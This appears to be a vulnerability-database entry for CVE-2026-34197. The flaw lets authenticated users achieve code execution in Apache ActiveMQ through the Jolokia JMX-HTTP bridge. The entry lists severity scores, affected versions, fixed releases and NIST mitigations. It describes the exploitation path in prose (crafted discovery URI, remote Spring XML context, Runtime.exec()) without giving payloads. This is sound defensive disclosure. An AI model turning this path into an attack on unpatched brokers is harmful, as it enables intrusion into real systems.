CVE-2026-34197
Published: 07 April 2026
Summary
CVE-2026-34197 is a high-severity Improper Input Validation (CWE-20) vulnerability in Apache Activemq. Its CVSS base score is 8.8 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 0.1% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
CVE-2026-34197 is an improper input validation and code injection vulnerability affecting Apache ActiveMQ Broker, Apache ActiveMQ All, and Apache ActiveMQ versions before 5.19.4 as well as the 6.0.0 through 6.2.2 release trains. The flaw stems from the Jolokia JMX-HTTP bridge exposed at /api/jolokia/ on the web console; its default access policy permits exec operations against all org.apache.activemq:* MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).
An authenticated attacker can invoke these operations with a crafted discovery URI that causes the VM transport's brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. Because the context instantiates all singleton beans before BrokerService performs configuration validation, the attacker can achieve arbitrary code execution inside the broker JVM, for example by invoking Runtime.exec() from a bean factory method.
The Apache ActiveMQ security advisory and the oss-security posting both recommend immediate upgrade to 5.19.4 or 6.2.3. CISA lists the CVE in its Known Exploited Vulnerabilities catalog, confirming in-the-wild exploitation. The associated EPSS score has remained consistently high (current 0.8346, peak 0.8529), indicating sustained exploitation interest since disclosure.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-19588
Vulnerability details
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations…
more
on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue
- CWE(s)
- KEV Date Added
- 16 April 2026
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Vulnerability in exposed Jolokia JMX-HTTP bridge on ActiveMQ web console enables authenticated attackers to achieve remote code execution via crafted MBean operations and Spring XML context loading, directly facilitating exploitation of a public-facing application.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires validation of all inputs (including discovery URIs and brokerConfig parameters) before they are processed by ResourceXmlApplicationContext or BrokerService methods.
Enforces the Jolokia access policy so that exec operations on org.apache.activemq:* MBeans such as addNetworkConnector are denied for non-privileged subjects.
Limits the privileges granted to authenticated Jolokia users so they cannot invoke high-risk BrokerService operations that lead to remote class loading and code execution.